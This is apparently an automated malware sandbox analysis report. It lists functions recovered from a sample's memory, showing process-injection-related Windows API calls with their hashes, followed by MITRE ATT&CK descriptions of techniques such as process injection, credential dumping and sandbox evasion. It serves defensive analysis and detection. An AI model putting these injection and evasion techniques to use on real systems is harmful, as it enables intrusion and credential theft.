WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D7CF30

Strings

J)lv, xrefs: 07D7CEBF

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: J)lv
API String ID: 3559483778-2455759496
Opcode ID: de1fd92fbc307e830a93788e43467de62884a91b8a6a029c6945d4990330216c
Instruction ID: 212128257b3f95cccf2bfe7c98dd1c489105aa446c2f2073c17dd76f3897a216
Opcode Fuzzy Hash: de1fd92fbc307e830a93788e43467de62884a91b8a6a029c6945d4990330216c
Instruction Fuzzy Hash: 912124B19103499FDB10CFAAC881BDEFBF5FF48310F10842AE918A7240D778A944CBA4

Function 07D7C458 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 07D7C4D6

Strings

J)lv, xrefs: 07D7C474

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID: J)lv
API String ID: 983334009-2455759496
Opcode ID: f024138b73905abcfbf4abe40c81885015116f8fd9185dd576b940694ec3fd95
Instruction ID: 53e9ee317f87f2acae1946696b03bc57bf3d86af924deba4df0b16d7962d0696
Opcode Fuzzy Hash: f024138b73905abcfbf4abe40c81885015116f8fd9185dd576b940694ec3fd95
Instruction Fuzzy Hash: 022138B1D003099FDB10DFAAC4857AEFBF9EF88314F14842AD519A7240DB78A944CFA4

Function 064AAD30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 064AADB7

Strings

J)lv, xrefs: 064AAD4F

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID: J)lv
API String ID: 3793708945-2455759496
Opcode ID: f605a17aa8bafc17d61eed1d1c8f2b7c6aa9cc89915efe039233236dcebb11ec
Instruction ID: 0c2ac9d96a97e8a4b522827f60f1a07143ee08f38044355c5ce418224ea8c671
Opcode Fuzzy Hash: f605a17aa8bafc17d61eed1d1c8f2b7c6aa9cc89915efe039233236dcebb11ec
Instruction Fuzzy Hash: 3321E6B5900348EFDB10CFAAD884ADEFBF9EB48310F14801AE954A7350C374A954CF65

Function 064AAD28 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 064AADB7

Strings

J)lv, xrefs: 064AAD4F

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID: J)lv
API String ID: 3793708945-2455759496
Opcode ID: ceb07aef70545ea788638da0a49f0b106a792d1a661817ae517d0659fcd7157c
Instruction ID: dfaaf1ba22cb866e8cb8a79666bfd570007d15c62f342217a88caf87fdafe241
Opcode Fuzzy Hash: ceb07aef70545ea788638da0a49f0b106a792d1a661817ae517d0659fcd7157c
Instruction Fuzzy Hash: 212103B5800248DFDB40CF9AD980ADEBBF5EB48310F24841AE958A7350C379AA54CF65

Function 07D7D398 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07D7D40F

Strings

J)lv, xrefs: 07D7D3B4

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: J)lv
API String ID: 544645111-2455759496
Opcode ID: 2b2d30ded1d35645269ed3f2783771fb00684924353d6eb3fcd6779b524d95cc
Instruction ID: 1fea07741859c302b6febe878979ce07bbb53884ebebc7a807f119a25eaedb9e
Opcode Fuzzy Hash: 2b2d30ded1d35645269ed3f2783771fb00684924353d6eb3fcd6779b524d95cc
Instruction Fuzzy Hash: 322135B18003499FDB10CFAAC841BEEFBF5EF88320F108429D519A7240D739A900CFA5

Function 07D734B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07D7352B

Strings

J)lv, xrefs: 07D734D7

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: J)lv
API String ID: 544645111-2455759496
Opcode ID: 2071851d973f528ed3d92e64ca3212e8ce18ae217524896157a13c1b985d34a5
Instruction ID: f4bfdb361a37f2da60c938cadc31e15cd1fd7c01741b8e27d0d4b88c98048cf7
Opcode Fuzzy Hash: 2071851d973f528ed3d92e64ca3212e8ce18ae217524896157a13c1b985d34a5
Instruction Fuzzy Hash: AE2108B59006499FDB10CF9AC444BDEFBF4EF48320F108429E968A7350D374A644CFA5

Function 07D7F540 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 07D7F5B1

Strings

J)lv, xrefs: 07D7F55A

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: EnumThreadWindows
String ID: J)lv
API String ID: 2941952884-2455759496
Opcode ID: f34bfe4fd2df592c68e2ce7d40988d5f1d70ef2f5b87cb377c453fa4eb6b23d8
Instruction ID: c0f8071e08dabbf70f60a9005a21eb4fd0868529e52b33642422990763399c01
Opcode Fuzzy Hash: f34bfe4fd2df592c68e2ce7d40988d5f1d70ef2f5b87cb377c453fa4eb6b23d8
Instruction Fuzzy Hash: 702127B1D0021A8FDB14CF9AC844BEEFBF5EB88320F14842AD454A3350D778A945CFA5

Function 07D7F988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 07D7FA05

Strings

J)lv, xrefs: 07D7F9AA

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: Message
String ID: J)lv
API String ID: 2030045667-2455759496
Opcode ID: 5f6fdcf035cd16ddacf0be36f84d5a26a5061e6f767dd88829bf4d48ada5097e
Instruction ID: b18455cb059ec0f57d9ec0fec232ac3cbe1f3c5dc4c7c9c5b34a0e985dd05f97
Opcode Fuzzy Hash: 5f6fdcf035cd16ddacf0be36f84d5a26a5061e6f767dd88829bf4d48ada5097e
Instruction Fuzzy Hash: CB21E3B5800749DFDB10CF9AD884ADEFBB5FB48314F10852ED858A7200D375A545CBA5

Function 07D734B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07D7352B

Strings

J)lv, xrefs: 07D734D7

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: J)lv
API String ID: 544645111-2455759496
Opcode ID: ba498de1d1be6177a962a4f87a3f8ece83fda937741ab020df771fb74e5d4ca7
Instruction ID: cae4dd8814a92555cba2dab089f5a198968f35e5f98d5b82cf202152f646f7ab
Opcode Fuzzy Hash: ba498de1d1be6177a962a4f87a3f8ece83fda937741ab020df771fb74e5d4ca7
Instruction Fuzzy Hash: F521E4B5900649DFDB10CF9AC884BDEFBF4FB48320F508429E968A7250D378A644CFA5

Function 064A7808 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,064A8721,00000800,00000000,00000000), ref: 064A8932

Strings

J)lv, xrefs: 064A88E7

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: J)lv
API String ID: 1029625771-2455759496
Opcode ID: 8e5805b8c3de7f4303f3254b6d6155efa16c304c9b670af1779af725fb87c7b9
Instruction ID: c089c84d34ae1cc48231f2bcdc49fe8f3df6b650459293fb1b857d6d87c2ab38
Opcode Fuzzy Hash: 8e5805b8c3de7f4303f3254b6d6155efa16c304c9b670af1779af725fb87c7b9
Instruction Fuzzy Hash: D31103B6C00349DFDB50CF9AC844A9EFBF8EB58710F14842ED519A7200C379A545CFA5

Function 07D7CB28 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D7CB96

Strings

J)lv, xrefs: 07D7CB3F

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: J)lv
API String ID: 4275171209-2455759496
Opcode ID: 0b4f1264165374518aca65cc4d735d7d18bd259860f842807aa649d977296eca
Instruction ID: 703da0cb6b5388c62ebc346714b833d41132d710a36940339fd552bb96731456
Opcode Fuzzy Hash: 0b4f1264165374518aca65cc4d735d7d18bd259860f842807aa649d977296eca
Instruction Fuzzy Hash: 94112671800349DFDB10DFAAC845BDEFBF9EF88320F248819E519A7250C775A540CBA4

Function 064A88C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,064A8721,00000800,00000000,00000000), ref: 064A8932

Strings

J)lv, xrefs: 064A88E7

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: J)lv
API String ID: 1029625771-2455759496
Opcode ID: 080067ec2007114c87669873a2d03503c666d1edeb3e288ce6245f817f919c8f
Instruction ID: ce8356c8adb2d425b9a875065d696f687755e0e1e3f16e7f78a54892572ef686
Opcode Fuzzy Hash: 080067ec2007114c87669873a2d03503c666d1edeb3e288ce6245f817f919c8f
Instruction Fuzzy Hash: 621103BA800309CFDB10CF9AC540ADAFBF4EB58310F14842AD529AB310C379A506CFA5

Function 064A8640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 064A86A6

Strings

J)lv, xrefs: 064A865F

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: HandleModule
String ID: J)lv
API String ID: 4139908857-2455759496
Opcode ID: d7da3e14cfef0267fd0bfee296bcfb1196639bce8967f865e576a857a2d12b2d
Instruction ID: 7af385f7a0e5ea98b79e2bbb7c4d6776bad70d1b079e47f38191fb7c76ca07f5
Opcode Fuzzy Hash: d7da3e14cfef0267fd0bfee296bcfb1196639bce8967f865e576a857a2d12b2d
Instruction Fuzzy Hash: D411DFB5C007499FDB10CF9AC844A9EFBF4EB88224F15841AD829B7310D379A545CFA5

Function 07D7DD88 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07D7F065

Strings

J)lv, xrefs: 07D7F02A

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: Initialize
String ID: J)lv
API String ID: 2538663250-2455759496
Opcode ID: 717243a18ed3b6e3ebef175d4d0aab1b7f9c4e2b31c3e27b8a0820fdc04584a4
Instruction ID: 6c31dc9146954bd8cbb8540634dfcfcf51fff12ee5837af9ac8d740688dd64d9
Opcode Fuzzy Hash: 717243a18ed3b6e3ebef175d4d0aab1b7f9c4e2b31c3e27b8a0820fdc04584a4
Instruction Fuzzy Hash: 5811F2B1800649CFDB20DF9AD449B9EFBF8EB48220F208459D558B7350D379A944CFA5

Function 07D7FD30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07D7FD8D

Strings

J)lv, xrefs: 07D7FD4A

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: MessagePost
String ID: J)lv
API String ID: 410705778-2455759496
Opcode ID: 9ae1d5123a8e50c6fdca0d899e77fd6891429c20fc8a1f0e414337c1340fd57b
Instruction ID: 1c8989b8a8eb3604ce134309e577913e8f4b8b6da5ebf300c6add2d9aceefa4f
Opcode Fuzzy Hash: 9ae1d5123a8e50c6fdca0d899e77fd6891429c20fc8a1f0e414337c1340fd57b
Instruction Fuzzy Hash: 431103B5800749DFDB10DF9AC885BDEFBF8EB48320F148419D518A7200C375A944CFA5

Function 07D00DD3 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

D, xrefs: 07D00E2A

Memory Dump Source

Source File: 0000000D.00000002.4084198136.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d00000_file.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: fe9dc8b973b52936ea84adb1cab305cc70781e0e7b8c6a927356aebb6d77370d
Instruction ID: 4c0367ddc112ed6d687a71d0fa1cb40158d26c461f70cde30fc5cec6f66d1c61
Opcode Fuzzy Hash: fe9dc8b973b52936ea84adb1cab305cc70781e0e7b8c6a927356aebb6d77370d
Instruction Fuzzy Hash: FC31589140E3C66FC71387749C65695BF70AE03214B1E16EBC4D1DB6E3D618090AC7A3

Function 07D09BD8 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4084198136.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeeccd900743a3b99163a68f5e16d49674adf2966f69f13b508a103017fcf174
Instruction ID: c130a6dd3875696c039aa2edd91d609a5dc40345ccc47b3e7561253eb9af5d19
Opcode Fuzzy Hash: aeeccd900743a3b99163a68f5e16d49674adf2966f69f13b508a103017fcf174
Instruction Fuzzy Hash: E0C16C31B113558FCB04BBB9E89926EBBB2FF88210F458969D449E7344DE389849C7E1

Function 00D6D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4061664962.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d6d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00a14ab379feff165a6c9b33b08cc62e544dde77287586af70f52251249541ef
Instruction ID: f87fcfe4ad0cde21063d63a090578ab4e6e9d21cda97fe7ee88a9356addf7772
Opcode Fuzzy Hash: 00a14ab379feff165a6c9b33b08cc62e544dde77287586af70f52251249541ef
Instruction Fuzzy Hash: B4210771A04304EFDB05DF14E5D0B25BB66FB88314F24C56DD9494B252C376D84ACA75

Function 00D6D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4061664962.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d6d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e41fb286292551c1d8d8c54ff20af30622d0cc6754a8d75d02cda5a482c6e9e1
Instruction ID: 4234fd6df8819330dcf9ed876d58ef9b7717fb1e6901ff5272e3edafef162c74
Opcode Fuzzy Hash: e41fb286292551c1d8d8c54ff20af30622d0cc6754a8d75d02cda5a482c6e9e1
Instruction Fuzzy Hash: 8921F575A04244EFDB14DF24E5C0B26BB66FB84314F24C56DE9494B286C337D847CA71

Function 00D6D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4061664962.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d6d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1c8ed605b93968b310804e2be23729b6cb1566a006056fd2a0e64c83b7b1527
Instruction ID: ecf7d1ba2ebfb6bb0217cfeb268e48d78af0c17c68810593b2f4d4f309a76b46
Opcode Fuzzy Hash: d1c8ed605b93968b310804e2be23729b6cb1566a006056fd2a0e64c83b7b1527
Instruction Fuzzy Hash: 922162755093C09FCB12CF24D994715BF72EB46314F29C5EAD8498F6A7C33A980ACB62

Function 00D6D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4061664962.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_d6d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: 3473d4c5f2e99c6fc3ffe3dcc4a8a1384d7fa01032f27211c28bd3dd498b359d
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: AB118B75A04284DFCB15CF10D5D4B15FBA2FB88314F28C6A9D8494B696C33AD84ACB62

Function 07D0DBD1 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4084198136.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a68687f818a143a0b4d5579b89d14ea85010b645750c1e53016d2ab6286712
Instruction ID: 24fd534347d0a567fde821c81031ca4bdd6ceaf27df93c0d6518cc37ee6bd5d1
Opcode Fuzzy Hash: e7a68687f818a143a0b4d5579b89d14ea85010b645750c1e53016d2ab6286712
Instruction Fuzzy Hash: BEE0B630616354CFDB54CBA4D984888B7B6FF49301F505499E8069B364C735E981CE41

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
